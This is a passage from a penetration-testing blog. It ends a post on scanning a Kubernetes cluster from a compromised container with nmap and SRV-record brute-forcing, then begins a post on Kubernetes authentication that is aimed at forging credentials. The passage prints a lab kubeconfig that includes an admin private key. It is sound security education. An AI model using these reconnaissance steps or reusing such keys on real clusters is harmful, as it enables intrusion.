<p>We can repeat the above for some “nearby” ranges for our services (e.g. replacing the X in <code class="language-plaintext highlighter-rouge">10.X.0.0/16</code> with numbers from 90 to 120) to get a more complete list of live service hosts.</p>
<p>The pods network is a bit more reasonably sized, we can cover the entire thing with CIDR <code class="language-plaintext highlighter-rouge">172.16.0.0/12</code>. Lets repeat the nmap process from above with that range.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# nmap -oG dns_scan_svc_2 -sn -Pn -R 172.16.0.0/12
[SNIP]
bash-5.1# grep 'Host' dns_scan_svc_2 | grep -v '()'
Host: 172.16.7.136 (172-16-7-136.theia.default.svc.cluster.local) Status: Up
Host: 172.16.7.139 (172-16-7-139.istio-egressgateway.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.140 (172-16-7-140.kiali.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.142 (172-16-7-142.jaeger-collector.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.143 (172-16-7-143.istiod.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.145 (172-16-7-145.ichnaea.default.svc.cluster.local) Status: Up
Host: 172.16.7.146 (172-16-7-146.kube-dns.kube-system.svc.cluster.local) Status: Up
Host: 172.16.7.151 (172-16-7-151.argocd-metrics.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.152 (172-16-7-152.argocd-server.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.153 (172-16-7-153.argocd-notifications-controller-metrics.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.154 (172-16-7-154.argocd-applicationset-controller.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.155 (172-16-7-155.istio-ingressgateway.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.156 (172-16-7-156.argocd-dex-server.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.157 (172-16-7-157.grafana.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.159 (hacker-container) Status: Up
Host: 172.16.7.161 (172-16-7-161.kube-dns.kube-system.svc.cluster.local) Status: Up
Host: 172.16.7.163 (172-16-7-163.argocd-repo-server.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.165 (172-16-7-165.argocd-redis.argocd.svc.cluster.local) Status: Up
Host: 172.16.7.166 (172-16-7-166.prometheus.istio-system.svc.cluster.local) Status: Up
Host: 172.16.7.177 (172-16-7-177.my-nginx-svc1.argotest.svc.cluster.local) Status: Up
Host: 172.16.7.182 (172-16-7-182.haproxy.default.svc.cluster.local) Status: Up
Host: 172.16.7.184 (172-16-7-184.mitmproxy.default.svc.cluster.local) Status: Up
</code></pre></div></div>
<p>Based on this, we can see that live pods associated with services seem to be all congregated within the subnet <code class="language-plaintext highlighter-rouge">172.16.7.0/24</code> - if we wanted to specifically scan to identify other pods not backed by services, this range would be a good place to concentrate with other scanning techniques. If you have a service mesh preventing TCP connect scanning as a way of identifying other hosts, see the next section for a last ditch option.</p>
<h2 id="port-scanning-of-live-hosts">Port scanning of live hosts</h2>
<p>Once you have a list of live IPs the next step is identifying open ports. In the absense of a service mesh complicating things by showing all ports open as discussed above, the quickest way to achieve this is simple port scanning with nmap or similar. Otherwise, I can think of two other options.</p>
<p>For IPs in the service range, each valid port will have an associated SRV DNS record as discussed in the section on Kubernetes DNS above. This means that you can start with the service A record name, for example <code class="language-plaintext highlighter-rouge">service.namespace.svc.cluster.local</code> and try and brute force TCP SRV records using a pattern like <code class="language-plaintext highlighter-rouge">_[value]._tcp.service.namespace.svc.cluster.local</code>.</p>
<p>As a last ditch option, I modified an existing Python port scanner I found to identify open ports by trying to trigger an application level response after a successful TCP connection. This is conceptually similar to the way UDP scanning works in nmap, and does largely work, but the implementation is still rudimentary and is not 100% reliable. If you want, you can grab this <a href="https://github.com/stephenbradshaw/pentesting_stuff/blob/master/utilities/appportscan.py">here</a>.</p>Stephen BradshawThis blog post talks about methods you can use from within a compromised container to discover additional accessible network services within a Kubernetes cluster. The post assumes you have obtained code execution in the compromised container, and want to use that access to attack other internal services within the cluster.Kubernetes Authentication Deep Dive2023-11-15T09:11:00+00:002023-11-15T09:11:00+00:00/2023/11/15/kubernetes-auth-deep-dive<p>In this post Im going to do a deep dive into two of the most commonly used authentication mechanisms for Kubernetes.</p>
<p>I will cover:</p>
<ul>
<li>How the default forms of user and service account authentication in Kubernetes work and how you can perform them using curl</li>
<li>A description of the cryptographic mechanisms that provide security for these authentication methods</li>
<li>How you can forge your own credentials for both authentication methods given the right information</li>
</ul>
<p>As well as providing detail on Kubernetes authentication, this post is also intended as a practical example to demonstrate how you can analyse a simple cryptosystem in order to attack it.</p>
<h1 id="kubernetes-test-environment">Kubernetes test environment</h1>
<p>For this blog post I will be using a simple Kubernetes system built on a single Ubuntu 22.04 VM. This is a throwaway reference system, not reachable from the Internet, setup purely for the purpose of this guide. I’m using a dedicated system because I will be showing some of it’s critical secrets in this post, which you should never do for a system you actually intend to use.</p>
<p>I used <a href="https://www.linuxtechi.com/install-kubernetes-on-ubuntu-22-04/">this guide</a> to setup Kubernetes, but skipped the sections on worker nodes section to create a single node clster. You can setup your own Kubernetes using the same guide if you want to follow along, it’s a pretty quick process, but be aware specific keys and identifiers will look different from mine.</p>
<p>If you are following this install guide and only using one node like me you will need to remove the “taint” on the master node to run additional containers on it. This is done by getting the node name using <code class="language-plaintext highlighter-rouge">kubectl get nodes</code> and then running the following command substituting your node name in the appropriate spot.</p>
<p>You will need to do this <strong>before</strong> step 9 in the tutorial or the test nginx deployment will not launch.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~$ kubectl taint nodes <node_name> node-role.kubernetes.io/control-plane:NoSchedule-
</code></pre></div></div>
<h1 id="kubernetes-101">Kubernetes 101</h1>
<p>This section will provide enough of an introduction to Kubernetes to understand the rest of this post. If you have used Kubernetes before and feel comfortable you understand what it is, feel free to skip ahead.</p>
<p>Kubernetes is an extensible framework of microservices that assist with running <a href="https://kubernetes.io/docs/concepts/containers/">containerised</a> applications. Kubernetes runs on top of a container runtime such as docker or containerd, and the Kubernetes services run as containers themselves using this runtime.</p>
<p>If you installed the Kubernetes base system as described in the previous section, we can use the <a href="https://kubernetes.io/docs/reference/kubectl/">kubectl</a> admin tool to explore the system and see how it looks. List the <a href="https://kubernetes.io/docs/concepts/workloads/pods/">pods</a> in the <code class="language-plaintext highlighter-rouge">kube-system</code> <a href="https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/">namespace</a> and you will see some of the services that make Kubernetes work. Here is my list of pods running in this namespace created via the install guide in the previous section.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~$ kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
calico-kube-controllers-658d97c59c-88r9c 1/1 Running 0 127m
calico-node-fwptx 1/1 Running 0 127m
coredns-5dd5756b68-snhk5 1/1 Running 0 128m
coredns-5dd5756b68-vlb88 1/1 Running 0 128m
etcd-kubemaster.thezoo.local 1/1 Running 0 128m
kube-apiserver-kubemaster.thezoo.local 1/1 Running 0 128m
kube-controller-manager-kubemaster.thezoo.local 1/1 Running 0 128m
kube-proxy-w2xfd 1/1 Running 0 128m
kube-scheduler-kubemaster.thezoo.local 1/1 Running 0 128m
</code></pre></div></div>
<p>Some of the more important pods you see include:</p>
<ul>
<li><a href="https://coredns.io/">coredns</a> to provide internal DNS services in the cluster</li>
<li><a href="https://docs.tigera.io/calico/latest/about/">calico</a> to provide L3/L4 networking for the cluster</li>
<li><a href="https://etcd.io/">etcd</a> that acts as a key-value datastore for the Kubernetes system</li>
<li><a href="https://kubernetes.io/docs/concepts/scheduling-eviction/kube-scheduler/">kube-scheduler</a> which coordinates running containers on available nodes</li>
<li><a href="https://kubernetes.io/docs/reference/command-line-tools-reference/kube-controller-manager/">kube-controller-manager</a> which maintains the cluster state</li>
<li><a href="https://kubernetes.io/docs/reference/command-line-tools-reference/kube-proxy/">kube-proxy</a> which runs on each node and forwards traffic to containers</li>
<li><a href="https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/">kube-apiserver</a> which exposes a HTTP API that acts as the primary way to interface with Kubernetes as an admin or developer user of the system</li>
</ul>
<p>Given that the API server is the primary way in which users of the system interact with Kubernetes, when I talk about Kubernetes authentication in this post, what I am referring to is authenticating to the API server. There are some other <a href="https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster">edge</a> <a href="https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/">cases</a> with authentication, but we wont specifically consider those here.</p>
<h1 id="kubernetes-authentication-overview">Kubernetes authentication overview</h1>
<p>There are two categories of user in a Kubernetes system:</p>
<ul>
<li><strong>Normal users</strong> - representing people configuring the Kubernetes install or using it to run containers. These are usually systems administrators or developers.</li>
<li><strong>Service accounts</strong> - respresenting system processes that run within the cluster. Running pods have a service account associated with them by default.</li>
</ul>
<p>Kubernetes has an extensible authentication system for it’s API server that is described in really good detail <a href="https://kubernetes.io/docs/reference/access-authn-authz/authentication/">here</a>. The extensibility does mean that there can be some variation in authentication configuration for custom Kubernetes installs, but default installs tend to support the methods I’ll be talking about below.</p>
<p>These methods are:</p>
<ul>
<li><strong>Normal user</strong> - X.509 certificate based authentication</li>
<li><strong>Service account</strong> - JWT based authentication</li>
</ul>
<p>Related to authentication (which is intended to verify the identity of an entity interacting with the system) is <a href="https://kubernetes.io/docs/reference/access-authn-authz/authorization/">authorization</a> (determining what verified users are allowed to to in the system). I wont describe this in detail in this post but do want to mention that it exists as it will be referenced when I talk later on about forging user certificates later in the post.</p>
<p>You can verify the authorization methods in use by checking the runtime configuration of the API server using a command like the following. You will need to change the pod name in the command to that of your own API server by getting it’s value using the <code class="language-plaintext highlighter-rouge">kubectl get pods -n kube-system</code> command as demonstrated in the previous section. The following shows that the <a href="https://kubernetes.io/docs/reference/access-authn-authz/node/">Node</a> and <a href="https://kubernetes.io/docs/reference/access-authn-authz/rbac/">RBAC</a> are enabled on my API server.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~$ kubectl describe pods kube-apiserver-kubemaster.thezoo.local -n kube-system | grep authorization
--authorization-mode=Node,RBAC
</code></pre></div></div>
<h1 id="rsa-and-x509-101">RSA and X.509 101</h1>
<p>The use of RSA cryptography and X.509 certificates is central to the authentication methods Im about to discuss, so Im going to provide a quick overview of how they work for those who are unfamiliar. Feel free to skip ahead if you dont need the refresher.</p>
<h2 id="rsa">RSA</h2>
<p>RSA refers to a public key cryptosystem, where key pairs, consisting of a private and a public key can be used to encrypt data for confidentiality and sign data to provide the identity of the private key owner. This is known as asymmetric encryption, where different keys are used for encrypting and decrypting, as opposed to symmetric encryption where the same key is used for both processes. The public key can be freely distributed and publicly associated with the keypairs owner in various ways. The private key is always kept private, and is an effective superset of both keys, although the reverse is not true. So, the public key can be extracted from the private, but the private key cannot be extracted from the public (at least for keys of sufficient size, although the size of “secure” keys grows with available computing power). The relationship between the keys is such that performing the cryptographic process with either of the keys is reversed by performing it with the paired key.</p>
<p>Encryption (to keep data secret) is performed by running the algorithm using the public key. The transformed data can then only be converted to it’s original form by using the private key - meaning only the private key owner can read data made secret with their public key.</p>
<p>Signing (to prove a particular set of data originates from a given entity) is done using the private key. Usually, the data to be signed is hashed, and the hash is passed through the encryption algorithm to generate a signature. Then, when the signature is run through the RSA algorithm with the widely available public key, it should result in the same hash value that can be generated independantly from the data. If the hash generated from a given piece of data matches the signature verified using a particular public key, you can know that data came from an entity who has knowledge of the associate private key.</p>
<h2 id="x509">X.509</h2>
<p>X.509 is a standard for identifying entities within a system and associating them with a key pair that can be used for cryptographic operations.</p>
<p>These certificates contain a number of standard and optional fields, that have been expanded upon in subsequent versions of the standard. We will look at some of the specific fields in more detail later. The certificates also contain a copy of the public key from the associated keypair and a signature that is used to verify the authenticity of the data by reference to a trusted authority.</p>
<p>X.509 assists with verifying information in the certificates by providing a framework for certificates to exist in a chain of trust, where private keys from certificates higher in the chain of trust sign certificates below them in the chain. Certificates that are used to sign other certificates are associated with entities known as Certificate Authorities (CAs), and contain a specific field to identity the certificate as such. Chains of trust can have one or more CAs, all decendant from an original root CA, which is always self signed (meaning that it’s own private key is used to generate it’s signature). Systems using these chains distribute the CA certificates to allow them to be used as the basis of trust for the system. The Certificate Authority is the trusted authority in these systems - the one that ultimately verifies the identity of the other entities in the system.</p>
<p>Creating decendant certificates within a chain of trust commonly involves creating a Certificate Signing Request (CSR). The private key of a CA in the chain is then used to create a signature of the details in the CSR, which is combined with identifiers for the signing CA and the CSR field data to create a signed certificate. The CSR is thus a certificate template that contains all the desired fields of the certificate, and is usually fed into a process managed by the CA that verifies the details in the CSR before returning a signed certificate. Using the CSR, the CA can fulfil it’s goal of confirming the accuracy of details presented in certificates in it’s chain whilst still maintaining control of it’s own private key.</p>
<p>Once they have their own certificate, entities in the chain of trust that are not CAs will usually use their associated keypair to perform additional cryptographic operations in the system. These operations are then tied to the identity information presented in the certificate. The specific way this occurs is system dependant, but usually involves additional signing or encrypting of data as mentioned above in the discussion on RSA. These certificates usually have fields included that define what specific cryptographic purposes the associated keys are intended to be used for.</p>
<p>An example of a cryptosystem using X.509 that most people will be familiar with is HTTPS (specifically its use of SSL/TLS for transport encryption). Multiple chains of trust are present here, provided by parties that can provide SSL certificates. The details of the related CAs are distributed with Operating Systems and HTTPS clients such as web browsers. When you visit a HTTPS site in your browser, the certificate (or chain of certificates) that is returned by the remote site to your web browser will need to be able to be matched back to a trusted certificate chain in your browsers certificate store to be trusted. The signature in the servers certificate will then need to be verified by the client using the public key from the matching Certificate Authority certificate. Once the signature of the certificate is verified and determined to be included in a valid chain of trust, then the details in the fields of the certificate can be considered. For example, is the certificate within it’s validity period, does the domain name used for connection match the ones in the certificate, has the certificate been revoked, does the certificate purpose match server identification, etc. Once these details are established to the satisfaction of the client, the public and private keys associated with the servers certificate are then used for a key exchange that allows the communication between client and server to be encrypted.</p>
<h2 id="rsa-and-x509-summarised">RSA and X.509 summarised</h2>
<p>So, in summary:</p>
<ul>
<li>RSA is an asymmetric cryptographic algorithm using keypairs consisting of public and private keys where the public key can be derived from the private but not vica versa</li>
<li>The RSA private key is kept secret to allow the owner to identify themselves using signatures and to allow others to encrypt content only they can decrypt</li>
<li>The RSA public key is distributed widely and allows others to verify the identify of private key owners via the key owners signatures or to encrypt data so that only the key owner can read it</li>
<li>X.509 certificates exist in a chain of trust, beginning with a root CA which self signs it’s own certificate, with certificates higher in the chain signing those beneath</li>
<li>X.509 associates an asymmetric keypair with identifying information in a certificate, which is signed using the private key of a Certificate Authority in the chain</li>
<li>X.509 CA certificates are associated with trusted system entities that can authenticate details about other entities in the system using signatures</li>
<li>X.509 certificates associate identity information with the cryptographic operations performed in a cryptosystem using the certificates keypair</li>
</ul>
<h1 id="user-x509-certificate-based-authentication">User X.509 certificate based authentication</h1>
<p>If you have been following along with the examples so far in this post you have already used X.509 user authentication to the Kubernetes cluster, perhaps without realising it. Let’s look at how.</p>
<p>Installing Kubernetes as described in the previously mentioned setup guide created a highly privileged configuration file for use with the <code class="language-plaintext highlighter-rouge">kubectl</code> tool. The install guide advised copying this file from it’s default location of <code class="language-plaintext highlighter-rouge">/etc/kubernetes/admin.conf</code> to <code class="language-plaintext highlighter-rouge">~/.kube/config</code>, where the <code class="language-plaintext highlighter-rouge">kubectl</code> tool can find it.</p>
<p>Mine looks like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~$ cat ~/.kube/config
apiVersion: v1
clusters:
- cluster:
certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURCVENDQWUyZ0F3SUJBZ0lJQnk2S2RmS2tRM2d3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TXpFeE1EZ3dNVEl3TkRaYUZ3MHpNekV4TURVd01USTFORFphTUJVeApFekFSQmdOVkJBTVRDbXQxWW1WeWJtVjBaWE13Z2dFaU1BMEdDU3FHU0liM0RRRUJBUVVBQTRJQkR3QXdnZ0VLCkFvSUJBUUMrbFVpOGNIZFViY2JIVWJGWTJmQ1d4UTQrT245alY0aXNxWGV1eXNEK2h2VDRQYVk5VE0vT3pPd1AKT0ExWW15aFNUckFEbFMrampxZngvTzczY0UxNVN3NUpvVzNKeVRtbW84c3AxRThPREIwVTdZdE9WaXJSQk1lbgpsa0pTS1A5Qk1UTU5hSW5FYkgvOHpQNUkvWTVsY0lWR3k2YjFCWXNHLysvQndqNGJBUGdtN1pRZmtoa3lxWTJqCmp4Y1VoMC9INWJVRlhlRmR5RmhocXhJdkhhRHNLRzViaFZIUkVtdUxTSnNvVEc4eWdEL2kzbmh0a3hGMEtIeGoKQTErUUtkRGphVFlham5hY25aMmpHK0FGRU5NQzJOWXczckFNWC9QNTROcDZQOUprdWtDUytYSzJsQ3ZiM1BJcQpTYWRNSWorbElUVGplemJnY3cyY3YyQSs2QjVEQWdNQkFBR2pXVEJYTUE0R0ExVWREd0VCL3dRRUF3SUNwREFQCkJnTlZIUk1CQWY4RUJUQURBUUgvTUIwR0ExVWREZ1FXQkJUZ1liRDROOGk3UGdwUzdPS3VFYjV4bEVIRW5EQVYKQmdOVkhSRUVEakFNZ2dwcmRXSmxjbTVsZEdWek1BMEdDU3FHU0liM0RRRUJDd1VBQTRJQkFRQVVqUmlhWGZRTgphRTQ1VmN3NTIvYlhldi83WlpxN05kL2s4Q0Z5Z0tOcjJybWlOUWNJa0k3MXF2SUxEeEZoT3NOVWhhSVRHUU5aCmRZT2ZnN0Q5NzZhZ24xSHRjQUFtOUlJRUFpaG51OVNMWFc0c1F2WHBXWEcrelNOemQyMUpES0QvWXlyMm5DVE0KKzZqTVNRYmw5Z0dPalhDdUVTNGY3anlqRXRVREh5dHRpQ3hSRFVuelNvcG9ybEc4ai94emhQOGlaSEN6UlZHUAppbjlhL2lFeDlSZUNOcm5zS1NIN0p1QWZYMFl6TEFBSng1SldBNGozcW9JMmJQZ0F2L25hVU9pSmNrWVpUdWtzCndkQnJURFJUOGtycThKZ2NCTEJEa1Y2blVENDUrbGxIQUI4R3VuSFhkdElYdzR0S3RCdUxneGs0NEtVUUpkb3YKeHdmNXJ0dmZWajY2Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
server: https://kubemaster.thezoo.local:6443
name: kubernetes
contexts:
- context:
cluster: kubernetes
user: kubernetes-admin
name: kubernetes-admin@kubernetes
current-context: kubernetes-admin@kubernetes
kind: Config
preferences: {}
users:
- name: kubernetes-admin
user:
client-certificate-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURJVENDQWdtZ0F3SUJBZ0lJV28rZ1plVWE3dzR3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TXpFeE1EZ3dNVEl3TkRaYUZ3MHlOREV4TURjd01USTFORGRhTURReApGekFWQmdOVkJBb1REbk41YzNSbGJUcHRZWE4wWlhKek1Sa3dGd1lEVlFRREV4QnJkV0psY201bGRHVnpMV0ZrCmJXbHVNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQXloQjFlR2JmNjBUUjE5RmYKUVdYb1VmTFVNWUFERnUydDBrL1ZUbDNSYzN6VVU0bjlvYU9VME5EQ1psNzIxK3Z4RS9ISnZxdnIrTDkzbHBWTwpnRVo3dytXT1MyN2ViL2Nrd0pwYlRheHB2WGYxdFlqNm9ub1lGSUNuWTlCMGE2SG91dC9hZ1UzQUtSRmNTK0NGCkVKVU9udnkrOHF0Y1luT2RBR2Jpd1ZieXJDWlNsVVVQMnZvOWNpcC9hUUJsSk96NEs4bTlSa3hoUjFBV3FUdU4KQkRMWTVMUlN1SHNOWTRnTk8yankzcU5qUjBxS0RFZ29IMmhKUnFmR3M4ZWdMVFM3OVBMdnFkbHJ2di8waHdUWQp1UXVoNWZOWW5SRkZwR1RreFR1b2wvNWNBWmlnQkRraUtrR0c2UFR2R2tiRWd6QTNveDZIckljcFZNSHpEdzRRCjhUOEVMUUlEQVFBQm8xWXdWREFPQmdOVkhROEJBZjhFQkFNQ0JhQXdFd1lEVlIwbEJBd3dDZ1lJS3dZQkJRVUgKQXdJd0RBWURWUjBUQVFIL0JBSXdBREFmQmdOVkhTTUVHREFXZ0JUZ1liRDROOGk3UGdwUzdPS3VFYjV4bEVIRQpuREFOQmdrcWhraUc5dzBCQVFzRkFBT0NBUUVBbmNuVnBDYUg5ck9GQkExMW5DalhISzAwRG13R1FJZnpjV2x0CkJ3RzRwR2lTK0RRR3ltODFwVEtHblhTQU1UZENvVmI2QzlrdWMrWkR0bG5iL05xZUk2WHpnVjdVbXp2V0E0N0gKSThvSHl5V3RjY1pNcUNwOTNnZUJDb3lZdW42SkpnTVozbHJhRTN6U1hxU0xzQ0hZWXpJZlRLWnFRdFFhbnBaNAp3SUVIMlBtZ1FxMmR4bmtoak9JSWF0bm54U0owdno1MDlXQVBQOStrSEpVeUh2N1V0a0pDL2J3aE5SdDh1RmluClBsN3Z3NGRUY1p4dS81SHlqcnlRcUVKUFBHS2ZnRlBja0dyclBXL1I1bUJHclVxRlZqYXN0TGQzekNMNG1GT0UKUWdyOTNMajh2ZnA1dFQrbFljRUkrYit3czdJaWFUQW9OdktVQXd4bXFmVzl2L1ZyZFE9PQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==
client-key-data: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFb3dJQkFBS0NBUUVBeWhCMWVHYmY2MFRSMTlGZlFXWG9VZkxVTVlBREZ1MnQway9WVGwzUmMzelVVNG45Cm9hT1UwTkRDWmw3MjErdnhFL0hKdnF2citMOTNscFZPZ0VaN3crV09TMjdlYi9ja3dKcGJUYXhwdlhmMXRZajYKb25vWUZJQ25ZOUIwYTZIb3V0L2FnVTNBS1JGY1MrQ0ZFSlVPbnZ5KzhxdGNZbk9kQUdiaXdWYnlyQ1pTbFVVUAoydm85Y2lwL2FRQmxKT3o0SzhtOVJreGhSMUFXcVR1TkJETFk1TFJTdUhzTlk0Z05PMmp5M3FOalIwcUtERWdvCkgyaEpScWZHczhlZ0xUUzc5UEx2cWRscnZ2LzBod1RZdVF1aDVmTlluUkZGcEdUa3hUdW9sLzVjQVppZ0JEa2kKS2tHRzZQVHZHa2JFZ3pBM294NkhySWNwVk1IekR3NFE4VDhFTFFJREFRQUJBb0lCQURpZmhodVlVSFZBVXNGMApwWW5SQWRvOC91TmtLUGw2M3pQSk5WQUJrRmtaaVBKai85UVUzL1hvR2lIUHlNSlhGclp0RWdqQmFwM0pJYnpyCjJCU3dLNnlJbm1oYkNEQStCR21JbDc5YmFrSXk1SUxiZ01pWkNEaHVtUG1xaDRWRjJNN05QaER2OWNKTVlCM1AKSzlxcXVtOHBDbVU4U2VZNDJhMHNKNnpnTFo2NW12L1pwVWJrRDVXMGtFckNtcldWYXBrb0dHUzMraEVmZ0xuVQo3WmkwWmQxSm04RFpBcVBaZjB2K2xEcTRRNlA2cFRyWkZhSHRKeXE1R3BaaG5LdzFRSVAvZDM4SkdrWmJ2bDZTCmdLdWREZHR3UWtLWDhFc3hzUElzcHFYWmlJRnRHbEd4UjNWT3lSaXo1WlIvTDVQUDYvSHZ5QjZVMVMzU0MydW0KMGc1TW9xMENnWUVBNVA3K3J6Yjh0WkFQQzdMdTAwcm5CeUZLVWoyWUVKU3hwLy8wREtuWGtmcTZ2a01wZmo1TwpRNC8vcVJxMFBsTXlIbFF3dFpkVXdmb0Raem1tSUZGYkNucDhoYWl5Z3JVMldVZjRkc0Y4ZVExN0NPVHhURGkzCndqL3Z5MXNtaUw2OEVIMjNNeW94YitXamRaZUJKQVRSS05pWDFvbHFFUE5xVlRrd21TZkl2b01DZ1lFQTRlUncKWUNpKytqUnVwTEMzb0FvYzZWTU9zZllJdkhhTG5iQkx0SVVZWnFpaU5Namp1UHJnSE0vcnRCc3BPYmhWSCtpdQpOZ0YrS2pMa1ZsY0Rxd1NuQ20vcEdoVCtXeFhVdjNpRjRHSWQ5cm5iYVhRbklIbzNLWk56VzRKWDJ1b2d0dmFaCjVNS3JiVHg4QnpjRGhIMDFGdEtBM1VycGFTTU9vN3h2blVUTnM0OENnWUVBa05DbGRWN2J2MkpEOFkwTnRYZG4KMUwxN3g3aUdBdTVWenoxeE05VHdxN09aQnh0b0VSc0wyWFFtSk9YcldJSzZiaTJseENEWWkvYzAwY0hHU2lmSQo0RDZIb3VzRlFOMmlhaUcyZ2p0b0lSR2lYZ1NTaURaU0Z6amh4NE4wUWdRRTRKVHdGeDQydDJITTFsK2lYb25oClQraHhWVTMvVW9ydEVzb2c3cW9YTEVzQ2dZQkt4ek9JTVpUZkFRSnJsSENGRXpQMDdXRGMrcVJ6dHc2SzJmU0YKd3RXTURtRDc5bENrU0xCdCtVcCtxY3NnNTJ1T2o1azBHWlJwWmNWKzYzazBZT3JuSXByWTNvQkJLTjN2c0hjcApDM0g5M2hMTE92OUUyaEJ1dS9naEgrbnpkelB6UFhrK2FFOFZiME5qcEF1UERWL0l1VkNkY1JJSmt1aGl2WnQ1ClJYQ084d0tCZ0NFVGU1bm9xMFRHL2xVSFRnYVU0L3lBdi8rZjc5azlTOWw4a2xxR2RPSnBZZVZRVHdvSjZ1b1oKRndUMGhXYXdjK3NSWXRGeGxYMUhzV2huWmNLbVg3OGxJM2pLRDFwYXVrZURhVjFzQ0p4QnlIWVVSOXN2aWM5ZgplektZVHdCS1NLN2NPaTVPNFlPV3J1N255TTVXdEhHN25CVngxNmJTaHJRL2Nzc3A3UWVxCi0tLS0tRU5EIFJTQSBQUklWQVRFIEtFWS0tLS0tCg==
</code></pre></div></div>
<p>Of note in this file are an external location for the API server in field <code class="language-plaintext highlighter-rouge">server</code> (https://kubemaster.thezoo.local:6443) and a number of base64 blobs of data labelled as <code class="language-plaintext highlighter-rouge">certificate-authority-data</code>, <code class="language-plaintext highlighter-rouge">client-certificate-data</code> and <code class="language-plaintext highlighter-rouge">client-key-data</code>. Let’s extract these blobs out to disk and check them out.</p>
<h2 id="analysing-authentication-data-from-the-kubectl-config-file">Analysing authentication data from the kubectl config file</h2>
<p>First let’s create a working directory for the files we will be analysing and change to it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~$ mkdir certs
stephen@kubemaster:~$ cd certs
</code></pre></div></div>
<p>Now let’s decode and dump to disk the first blob, for <code class="language-plaintext highlighter-rouge">certificate-authority-data</code> and see what’s in it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ echo 'LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURCVENDQWUyZ0F3SUJBZ0lJQnk2S2RmS2tRM2d3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TXpFeE1EZ3dNVEl3TkRaYUZ3MHpNekV4TURVd01USTFORFphTUJVeApFekFSQmdOVkJBTVRDbXQxWW1WeWJtVjBaWE13Z2dFaU1BMEdDU3FHU0liM0RRRUJBUVVBQTRJQkR3QXdnZ0VLCkFvSUJBUUMrbFVpOGNIZFViY2JIVWJGWTJmQ1d4UTQrT245alY0aXNxWGV1eXNEK2h2VDRQYVk5VE0vT3pPd1AKT0ExWW15aFNUckFEbFMrampxZngvTzczY0UxNVN3NUpvVzNKeVRtbW84c3AxRThPREIwVTdZdE9WaXJSQk1lbgpsa0pTS1A5Qk1UTU5hSW5FYkgvOHpQNUkvWTVsY0lWR3k2YjFCWXNHLysvQndqNGJBUGdtN1pRZmtoa3lxWTJqCmp4Y1VoMC9INWJVRlhlRmR5RmhocXhJdkhhRHNLRzViaFZIUkVtdUxTSnNvVEc4eWdEL2kzbmh0a3hGMEtIeGoKQTErUUtkRGphVFlham5hY25aMmpHK0FGRU5NQzJOWXczckFNWC9QNTROcDZQOUprdWtDUytYSzJsQ3ZiM1BJcQpTYWRNSWorbElUVGplemJnY3cyY3YyQSs2QjVEQWdNQkFBR2pXVEJYTUE0R0ExVWREd0VCL3dRRUF3SUNwREFQCkJnTlZIUk1CQWY4RUJUQURBUUgvTUIwR0ExVWREZ1FXQkJUZ1liRDROOGk3UGdwUzdPS3VFYjV4bEVIRW5EQVYKQmdOVkhSRUVEakFNZ2dwcmRXSmxjbTVsZEdWek1BMEdDU3FHU0liM0RRRUJDd1VBQTRJQkFRQVVqUmlhWGZRTgphRTQ1VmN3NTIvYlhldi83WlpxN05kL2s4Q0Z5Z0tOcjJybWlOUWNJa0k3MXF2SUxEeEZoT3NOVWhhSVRHUU5aCmRZT2ZnN0Q5NzZhZ24xSHRjQUFtOUlJRUFpaG51OVNMWFc0c1F2WHBXWEcrelNOemQyMUpES0QvWXlyMm5DVE0KKzZqTVNRYmw5Z0dPalhDdUVTNGY3anlqRXRVREh5dHRpQ3hSRFVuelNvcG9ybEc4ai94emhQOGlaSEN6UlZHUAppbjlhL2lFeDlSZUNOcm5zS1NIN0p1QWZYMFl6TEFBSng1SldBNGozcW9JMmJQZ0F2L25hVU9pSmNrWVpUdWtzCndkQnJURFJUOGtycThKZ2NCTEJEa1Y2blVENDUrbGxIQUI4R3VuSFhkdElYdzR0S3RCdUxneGs0NEtVUUpkb3YKeHdmNXJ0dmZWajY2Ci0tLS0tRU5EIENFUlRJRkl